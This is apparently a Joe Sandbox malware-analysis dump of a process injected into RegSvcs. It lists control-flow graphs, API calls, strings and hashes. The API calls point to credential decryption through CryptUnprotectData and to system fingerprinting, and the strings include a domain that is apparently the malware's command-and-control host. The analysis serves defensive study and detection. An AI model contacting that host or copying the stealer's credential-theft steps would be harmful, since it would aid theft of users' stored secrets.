                                                                                                control_flow_graph 0 43b7b0-43b7d5 1 43b7e0-43b816 0->1 1->1 2 43b818-43b82e 1->2 3 43b830-43b84a 2->3 3->3 4 43b84c-43b88f 3->4 5 43b890-43b8c3 4->5 5->5 6 43b8c5-43b8df 5->6 8 43b9b0-43b9b8 6->8 9 43b8e5-43b8ef 6->9 10 43b9c0-43b9d7 8->10 11 43b8f0-43b938 9->11 10->10 13 43b9d9-43ba2f 10->13 11->11 12 43b93a-43b94b 11->12 14 43b950-43b9a1 12->14 15 43ba30-43ba63 13->15 14->14 16 43b9a3-43b9ac 14->16 15->15 17 43ba65-43bab1 15->17 16->8 18 43bac0-43bb09 17->18 18->18 19 43bb0b-43bb5f CoCreateInstance 18->19 20 43bb65-43bb95 19->20 21 43c09e-43c0ca call 441c60 GetVolumeInformationW 19->21 23 43bba0-43bbdd 20->23 26 43c0d3-43c0d5 21->26 27 43c0cc-43c0cf 21->27 23->23 25 43bbdf-43bc08 SysAllocString 23->25 32 43bc0e-43bc28 CoSetProxyBlanket 25->32 33 43c08d-43c09a SysFreeString 25->33 28 43c0ed-43c0f4 26->28 27->26 30 43c100-43c119 28->30 31 43c0f6-43c0fd 28->31 36 43c120-43c138 30->36 31->30 34 43c083-43c089 32->34 35 43bc2e-43bc43 32->35 33->21 34->33 37 43bc50-43bc62 35->37 36->36 38 43c13a-43c16f 36->38 37->37 39 43bc64-43bce1 SysAllocString 37->39 40 43c170-43c1a6 38->40 41 43bcf0-43bd1a 39->41 40->40 42 43c1a8-43c1d7 call 41c7d0 40->42 41->41 43 43bd1c-43bd43 SysAllocString 41->43 46 43c1e0-43c1e8 42->46 49 43bd49-43bd6b 43->49 50 43c06d-43c07f SysFreeString * 2 43->50 46->46 48 43c1ea-43c1ec 46->48 51 43c1f2-43c202 call 408120 48->51 52 43c0e0-43c0e7 48->52 57 43c063-43c069 49->57 58 43bd71-43bd74 49->58 50->34 51->52 52->28 54 43c207-43c20e 52->54 57->50 58->57 59 43bd7a-43bd7f 58->59 59->57 60 43bd85-43bdcf VariantInit 59->60 61 43bdd0-43be02 60->61 61->61 62 43be04-43be19 61->62 63 43be1d-43be1f 62->63 64 43c052-43c05f VariantClear 63->64 65 43be25-43be2e 63->65 64->57 65->64 66 43be34-43be41 65->66 67 43be43-43be4a 66->67 68 43be87-43be89 66->68 69 43be66-43be6a 67->69 70 43be8b-43bea5 call 407f80 68->70 71 43be50-43be58 69->71 72 43be6c-43be75 69->72 79 43beab-43beb7 70->79 80 43c00a-43c021 70->80 74 43be5b-43be64 71->74 75 43be77-43be7a 72->75 76 43be7c-43be80 72->76 74->69 74->70 75->74 76->74 78 43be82-43be85 76->78 78->74 79->80 81 43bebd-43bec5 79->81 82 43c023-43c02d 80->82 83 43c042-43c04b call 407f90 80->83 84 43bed0-43beda 81->84 82->83 85 43c02f-43c039 82->85 83->64 87 43bef0-43bef6 84->87 88 43bedc-43bee1 84->88 85->83 89 43c03b-43c03e 85->89 92 43bf18-43bf28 87->92 93 43bef8-43befb 87->93 91 43bfa0-43bfaa 88->91 89->83 97 43bfac-43bfb2 91->97 95 43bfbe-43bfc7 92->95 96 43bf2e-43bf31 92->96 93->92 94 43befd-43bf13 93->94 94->91 100 43bfd1-43bfd4 95->100 101 43bfc9-43bfcf 95->101 96->95 98 43bf37-43bf9a 96->98 97->80 99 43bfb4-43bfb6 97->99 98->91 99->84 104 43bfbc 99->104 102 43c006-43c008 100->102 103 43bfd6-43c004 100->103 101->97 102->91 103->91 104->80
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(7F7E7D64,00000000,00000001,D3D2D1DD,00000000,?,D3D2D1DD,?,?,?), ref: 0043BB57
                                                                                                • SysAllocString.OLEAUT32 ref: 0043BBE2
                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,D3D2D1DD,?,?,?), ref: 0043BC20
                                                                                                • SysAllocString.OLEAUT32 ref: 0043BC67
                                                                                                • SysAllocString.OLEAUT32 ref: 0043BD1F
                                                                                                • VariantInit.OLEAUT32(?), ref: 0043BD8D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                • String ID: ./$qn
                                                                                                • API String ID: 65563702-3823645636
                                                                                                • Opcode ID: 33e9290a913fd713dbdf346d1838c108140739e0934d6ef781ef464a85dd720d
                                                                                                • Instruction ID: 2f0884b81ea7a4518840af457542ae1764f48caff3a768fe7da6a1d928f758ff
                                                                                                • Opcode Fuzzy Hash: 33e9290a913fd713dbdf346d1838c108140739e0934d6ef781ef464a85dd720d
                                                                                                • Instruction Fuzzy Hash: 1F52E172A083508FD718CF28C89176BBBE2EFC9310F14992EE6D59B391D7759805CB86

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 105 423e44-423e49 106 423e52 105->106 107 423e4b-423e50 105->107 108 423e55-423e75 call 407f80 RtlExpandEnvironmentStrings 106->108 107->108 111 423e84-423e8c 108->111 112 423e7c 108->112 113 423e95 111->113 114 423e8e-423e93 111->114 112->111 115 423e9c-423ed9 call 407f80 113->115 114->115 118 423ee0-423f06 115->118 118->118 119 423f08-423f10 118->119 120 423f12-423f17 119->120 121 423f31-423f3e 119->121 122 423f20-423f2f 120->122 123 423f40-423f44 121->123 124 423f61-423f7d call 443390 121->124 122->121 122->122 125 423f50-423f5f 123->125 128 423fb6-424067 124->128 129 423f94 124->129 130 423f84-423f8b 124->130 131 424269-424271 124->131 132 423f9e-423fa6 124->132 125->124 125->125 135 424070-4240a2 128->135 129->132 130->129 136 424273-424278 131->136 137 424280 131->137 133 4240ca 132->133 134 423fac-423fb1 132->134 138 4240d1-42417a call 407f80 133->138 134->138 135->135 139 4240a4-4240b8 call 420440 135->139 140 424287-424337 call 407f80 136->140 137->140 148 424180-4241cd 138->148 144 4240bd-4240c2 139->144 147 424340-42438c 140->147 144->133 147->147 149 42438e-4243a2 147->149 148->148 150 4241cf-4241df 148->150 151 4243c1-4243d2 149->151 152 4243a4-4243a6 149->152 153 424201-42420e 150->153 154 4241e1-4241e6 150->154 158 424250-424260 call 443390 151->158 159 4243d8-4243df 151->159 157 4243b0-4243bf 152->157 155 424210-424214 153->155 156 424231-424244 call 443390 153->156 160 4241f0-4241ff 154->160 161 424220-42422f 155->161 156->131 157->151 157->157 158->131 163 4243e0-4243ef 159->163 160->153 160->160 161->156 161->161 163->163 166 4243f1 163->166 166->158
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00423E6A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: 4Y>[$<QrS$A!K#$H%Z'$O-O/$P5Y7$Y1\3$d)E+$UW$]_
                                                                                                • API String ID: 237503144-2105826625
                                                                                                • Opcode ID: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                                                                • Instruction ID: 7b8528e6acc013927f719d16868986943a9a1bba7e440ced0a90d285d0ff4e0a
                                                                                                • Opcode Fuzzy Hash: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                                                                • Instruction Fuzzy Hash: 24D1EAB0608361DBC310CF55E88126BBBF0EF95354F448A2EF9D99B351E3789906CB96

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$DeleteMetricsSelectSystem
                                                                                                • String ID: $AnC$phC
                                                                                                • API String ID: 3911056724-4014303587
                                                                                                • Opcode ID: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                                                                • Instruction ID: 106fc45ad3404cda282eaa32535b81ccc0e8128c77ede95de355203d1d43b79a
                                                                                                • Opcode Fuzzy Hash: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                                                                • Instruction Fuzzy Hash: 0461A3B04497848FE760EF68D58978FBBE0BB85304F00892EE5D88B251D7B85458DF4B

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 181 408740-408751 call 43f980 184 408a02-408a04 ExitProcess 181->184 185 408757-40875e call 438b80 181->185 188 408764-408788 GetCurrentProcessId GetCurrentThreadId 185->188 189 4089fd call 440240 185->189 191 40878a-40878c 188->191 192 40878e-408852 SHGetSpecialFolderPathW GetForegroundWindow 188->192 189->184 191->192 193 408858-4088dd 192->193 194 4088df-408904 192->194 193->194 195 408910-40894f 194->195 195->195 196 408951-40898f call 43e840 195->196 199 408990-4089ac 196->199 200 4089c6-4089df call 409a60 199->200 201 4089ae-4089c4 199->201 204 4089e1 call 40c980 200->204 205 4089eb-4089f2 200->205 201->199 208 4089e6 call 40b5d0 204->208 205->189 207 4089f4-4089fa call 407f90 205->207 207->189 208->205
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00408764
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0040876E
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087C0
                                                                                                • GetForegroundWindow.USER32 ref: 0040884A
                                                                                                • ExitProcess.KERNEL32 ref: 00408A04
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                • String ID: b/7
                                                                                                • API String ID: 4063528623-2085417233
                                                                                                • Opcode ID: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                                                                • Instruction ID: 0d5a416f21ca3bcde6c043f2d710c8a16f1e6c6a059847071c546a7df00bc279
                                                                                                • Opcode Fuzzy Hash: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                                                                • Instruction Fuzzy Hash: EF71FB73A043154BC318EF79CD8576AF6D6ABC5320F0A863DE5C4A73D1EA7898048B85

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 212 40d690-40d6bf call 436590 call 4095a0 CoUninitialize 217 40d6c0-40d6fb 212->217 217->217 218 40d6fd-40d712 217->218 219 40d720-40d745 218->219 219->219 220 40d747-40d789 219->220 221 40d790-40d7c6 220->221 221->221 222 40d7c8-40d7d2 221->222 223 40d7d4-40d7d7 222->223 224 40d7eb-40d7f8 222->224 225 40d7e0-40d7e9 223->225 226 40d7fa-40d7ff 224->226 227 40d80d 224->227 225->224 225->225 228 40d800-40d809 226->228 229 40d810-40d81b 227->229 228->228 230 40d80b 228->230 231 40d82b-40d835 229->231 232 40d81d-40d81f 229->232 230->229 234 40d837-40d838 231->234 235 40d84b-40d853 231->235 233 40d820-40d829 232->233 233->231 233->233 236 40d840-40d849 234->236 237 40d855-40d856 235->237 238 40d86b-40d877 235->238 236->235 236->236 241 40d860-40d869 237->241 239 40d891-40d946 238->239 240 40d879-40d87b 238->240 243 40d950-40d960 239->243 242 40d880-40d88d 240->242 241->238 241->241 242->242 244 40d88f 242->244 243->243 245 40d962-40d982 243->245 244->239 246 40d990-40d9d5 245->246 246->246 247 40d9d7-40d9f4 call 40b600 246->247 249 40d9f9-40da26 247->249
                                                                                                APIs
                                                                                                  • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365D0
                                                                                                  • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365E0
                                                                                                  • Part of subcall function 00436590: DeleteObject.GDI32 ref: 00436623
                                                                                                  • Part of subcall function 00436590: SelectObject.GDI32 ref: 00436673
                                                                                                  • Part of subcall function 00436590: SelectObject.GDI32 ref: 004366CA
                                                                                                  • Part of subcall function 00436590: DeleteObject.GDI32 ref: 004366F8
                                                                                                • CoUninitialize.COMBASE ref: 0040D6A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$DeleteMetricsSelectSystem$Uninitialize
                                                                                                • String ID: ;d$SD$TC03$^_/C$misha-lomonosov.com
                                                                                                • API String ID: 1556769885-142681208
                                                                                                • Opcode ID: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                                                                • Instruction ID: 40ffb7c8dda840b4bdf12d856fc54da81b6c6fcd26267cd1a4ca77b1afe074d2
                                                                                                • Opcode Fuzzy Hash: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                                                                • Instruction Fuzzy Hash: 0DA1F6B56047918FD719CF39C4A0262BFE1FFA7314B28819DC0D64BB86D739A406CB99

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 365 42dee5-42deff 366 42df00-42df6a 365->366 366->366 367 42df6c-42df74 366->367 368 42df76-42df7f 367->368 369 42df8d-42df93 367->369 370 42df80-42df89 368->370 371 42df95-42ed01 369->371 370->370 372 42df8b 370->372 374 42ed10-42ed3d 371->374 372->371 374->374 375 42ed3f-42ed44 374->375 376 42ed46-42ed49 375->376 377 42ed5d 375->377 379 42ed50-42ed59 376->379 378 42ed5f-42ed6b 377->378 380 42ed81-42eda4 call 441c60 378->380 381 42ed6d-42ed6f 378->381 379->379 382 42ed5b 379->382 386 42eda9-42edc6 GetPhysicallyInstalledSystemMemory 380->386 383 42ed70-42ed7d 381->383 382->378 383->383 385 42ed7f 383->385 385->380 387 42edd0-42edf7 386->387 387->387 388 42edf9-42ee2e call 41c7d0 387->388 391 42ee30-42ee85 388->391 391->391 392 42ee87-42ee8f 391->392 393 42ee91-42ee97 392->393 394 42eead-42eeaf 392->394 396 42eea0-42eea9 393->396 395 42eeb2-42eebf 394->395 397 42eec1-42eec2 395->397 398 42eedb-42eee5 395->398 396->396 399 42eeab 396->399 400 42eed0-42eed9 397->400 401 42eee7-42eee8 398->401 402 42eefb-42ef3f 398->402 399->395 400->398 400->400 403 42eef0-42eef9 401->403 404 42ef40-42ef85 402->404 403->402 403->403 404->404 405 42ef87-42ef8c 404->405 406 42ef8e-42ef94 405->406 407 42efad-42efb0 405->407 409 42efa0-42efa9 406->409 408 42efb2-42efba 407->408 411 42efcb-42f08e 408->411 412 42efbc-42efbf 408->412 409->409 410 42efab 409->410 410->408 413 42efc0-42efc9 412->413 413->411 413->413
                                                                                                APIs
                                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EDAD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                                • String ID: $qk$'5%s
                                                                                                • API String ID: 3960555810-1674721824
                                                                                                • Opcode ID: 1bf49ac190f8508b2fffc7c03ebbba4de731e985bda5682ac35f640f532f0e98
                                                                                                • Instruction ID: 77e35e584cd91eb5155daa22bb8d7f3faef11dd04174e3cb06e18610c7d197b5
                                                                                                • Opcode Fuzzy Hash: 1bf49ac190f8508b2fffc7c03ebbba4de731e985bda5682ac35f640f532f0e98
                                                                                                • Instruction Fuzzy Hash: C6D1D4716047428FD719CF2AC491762FBE2BF96300B2DC5AEC4DA8B752D739A806CB54

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 414 42ecd0-42ed01 call 435ec0 call 407f90 420 42ed10-42ed3d 414->420 420->420 421 42ed3f-42ed44 420->421 422 42ed46-42ed49 421->422 423 42ed5d 421->423 425 42ed50-42ed59 422->425 424 42ed5f-42ed6b 423->424 426 42ed81-42edc6 call 441c60 GetPhysicallyInstalledSystemMemory 424->426 427 42ed6d-42ed6f 424->427 425->425 428 42ed5b 425->428 433 42edd0-42edf7 426->433 429 42ed70-42ed7d 427->429 428->424 429->429 431 42ed7f 429->431 431->426 433->433 434 42edf9-42ee2e call 41c7d0 433->434 437 42ee30-42ee85 434->437 437->437 438 42ee87-42ee8f 437->438 439 42ee91-42ee97 438->439 440 42eead-42eeaf 438->440 442 42eea0-42eea9 439->442 441 42eeb2-42eebf 440->441 443 42eec1-42eec2 441->443 444 42eedb-42eee5 441->444 442->442 445 42eeab 442->445 446 42eed0-42eed9 443->446 447 42eee7-42eee8 444->447 448 42eefb-42ef3f 444->448 445->441 446->444 446->446 449 42eef0-42eef9 447->449 450 42ef40-42ef85 448->450 449->448 449->449 450->450 451 42ef87-42ef8c 450->451 452 42ef8e-42ef94 451->452 453 42efad-42efb0 451->453 455 42efa0-42efa9 452->455 454 42efb2-42efba 453->454 457 42efcb-42f08e 454->457 458 42efbc-42efbf 454->458 455->455 456 42efab 455->456 456->454 459 42efc0-42efc9 458->459 459->457 459->459
                                                                                                APIs
                                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042EDAD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                                • String ID: $qk$'5%s
                                                                                                • API String ID: 3960555810-1674721824
                                                                                                • Opcode ID: 937cf4f40fa33fa539c53bab1cbec55eb70b2128064d8ef1c103061abfc67558
                                                                                                • Instruction ID: 774d1c6582b6df23f03d333cf1ee8e77294ae5f4637bee10b1881aef683745b3
                                                                                                • Opcode Fuzzy Hash: 937cf4f40fa33fa539c53bab1cbec55eb70b2128064d8ef1c103061abfc67558
                                                                                                • Instruction Fuzzy Hash: A4B1E1716047428BD719CF2AC450362FBE2BFA6300F6DC5AEC4DA8B752D739A846CB54

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 551 40cb44-40cb8b CoInitializeSecurity * 2
                                                                                                APIs
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB56
                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CB72
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeSecurity
                                                                                                • String ID:
                                                                                                • API String ID: 640775948-0
                                                                                                • Opcode ID: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
                                                                                                • Instruction ID: ff61b9231b5af6c48cb1d82934a630ea8aeeaa7d7eb1477661cb3efef4af383c
                                                                                                • Opcode Fuzzy Hash: 8656cd1a9d74df869ad8f22be8c3fd88ccb0ea15f397b936d6b69d150d3e7ac9
                                                                                                • Instruction Fuzzy Hash: 72E0BD383C83007BF6398B08AC97F247221A743F22F301214B3623E2E58AE07140451D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 29e7d69098086101bbac799b7b35378752f7b542f599ed17af3bf933a101616b
                                                                                                • Instruction ID: fd6d0c28c0521a4b2d3ba0d2fcd6f101c3ce844309344171b6c888af52a4c48d
                                                                                                • Opcode Fuzzy Hash: 29e7d69098086101bbac799b7b35378752f7b542f599ed17af3bf933a101616b
                                                                                                • Instruction Fuzzy Hash: F5821975A04B408FD714DF38C985396BBE2AF85324F198A3DD4EB877D2E678A445CB02
                                                                                                APIs
                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: CryptDataUnprotect
                                                                                                • String ID:
                                                                                                • API String ID: 834300711-0
                                                                                                • Opcode ID: a27188761cfd85d7ec1f0333a8f51a54ad9e0068bdc24ba5bb72e93f216a39f0
                                                                                                • Instruction ID: 5b988ee3757d9e29ab9f296af5c767d3f7ba0e13420727c7ac46e6bec5acf77a
                                                                                                • Opcode Fuzzy Hash: a27188761cfd85d7ec1f0333a8f51a54ad9e0068bdc24ba5bb72e93f216a39f0
                                                                                                • Instruction Fuzzy Hash: 115134716446025FCB19CF29CCC1687BBE2FB89304F19806ED8999F357EA79E8438744
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: klm"
                                                                                                • API String ID: 2994545307-2308819284
                                                                                                • Opcode ID: a25c1e98b60485462dc98a4d52786a884c618e57296232dbe7681567e15a77d3
                                                                                                • Instruction ID: 8789bd8e5de170319836c8e6b4e836532e50f116dbbdcba0dddf1708612731d7
                                                                                                • Opcode Fuzzy Hash: a25c1e98b60485462dc98a4d52786a884c618e57296232dbe7681567e15a77d3
                                                                                                • Instruction Fuzzy Hash: 8EB15A7270C3618BE7188F39E84167BB791EF95314F99862ED48597381D378EC0683DA
                                                                                                APIs
                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: CryptDataUnprotect
                                                                                                • String ID:
                                                                                                • API String ID: 834300711-0
                                                                                                • Opcode ID: 3596b27b00a398139ab61b9a9f2493e04994ff2f57b15bf561d8312ee2136e43
                                                                                                • Instruction ID: 877a3ec0fd1df911aac285de86fc99df006a5b0b03a90c59e71951ea2dd66968
                                                                                                • Opcode Fuzzy Hash: 3596b27b00a398139ab61b9a9f2493e04994ff2f57b15bf561d8312ee2136e43
                                                                                                • Instruction Fuzzy Hash: 343128B5900B419FC7308F29CC84766BBE2BF55304F19496EE46ACB761D739E881CB44
                                                                                                APIs
                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004183F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: CryptDataUnprotect
                                                                                                • String ID:
                                                                                                • API String ID: 834300711-0
                                                                                                • Opcode ID: ff18997f2262789df2a28c237525f6ee7240e02b4e0992baaa5df85b8d22fe65
                                                                                                • Instruction ID: 1a59348ec05e7f56259579615360e9f91351b56b2fbfb5c12ef62eceb2dabcd0
                                                                                                • Opcode Fuzzy Hash: ff18997f2262789df2a28c237525f6ee7240e02b4e0992baaa5df85b8d22fe65
                                                                                                • Instruction Fuzzy Hash: 8111E3B59006419FC7248F25CC84BA6B7E2BF55704F29892ED86ACB761D73AF881CB44
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(00443370,?,00000018,?,?,00000018,?,?,?), ref: 004402FE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: WT
                                                                                                • API String ID: 0-3626323073
                                                                                                • Opcode ID: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
                                                                                                • Instruction ID: 7fe90350ce32cbd7e95176aa356467c42c1670bfe7b117e2a0000bb4fcdc20cd
                                                                                                • Opcode Fuzzy Hash: c98c440a951f3e80385427973262f6473fe4faebb6d8defc51fc15df456e7494
                                                                                                • Instruction Fuzzy Hash: 27213A766083408FC7288F24C89066BF7E2EFC6318F19891DD69717685DB75A806CF8A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 8448f84bcdf5387fdb1ade7f916e006b21cd764feeb9d4c242b6861ef5379a18
                                                                                                • Instruction ID: 8f228e5e5a1e4a0df9a7232996a6af5781287942daa8e57b9f502877da121123
                                                                                                • Opcode Fuzzy Hash: 8448f84bcdf5387fdb1ade7f916e006b21cd764feeb9d4c242b6861ef5379a18
                                                                                                • Instruction Fuzzy Hash: 4F312735B406428BE7298F29D850332FBA3EF96324B2C825DD1D1577E6D778EC42C644

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 534 40c9a6-40caf5 CoInitializeEx * 2
                                                                                                APIs
                                                                                                • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C9AA
                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CADC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID: i.
                                                                                                • API String ID: 2538663250-1725878519
                                                                                                • Opcode ID: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                                                                • Instruction ID: ba51fcffb96049ba4a9d2ecb0e51bddf3b28327b6748284e76850d605b8acc93
                                                                                                • Opcode Fuzzy Hash: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                                                                • Instruction Fuzzy Hash: 0F41C9B4810B40AFD370EF39D94B7127EB8AB05250F504B1DF9E6866D4E631A4198BD7

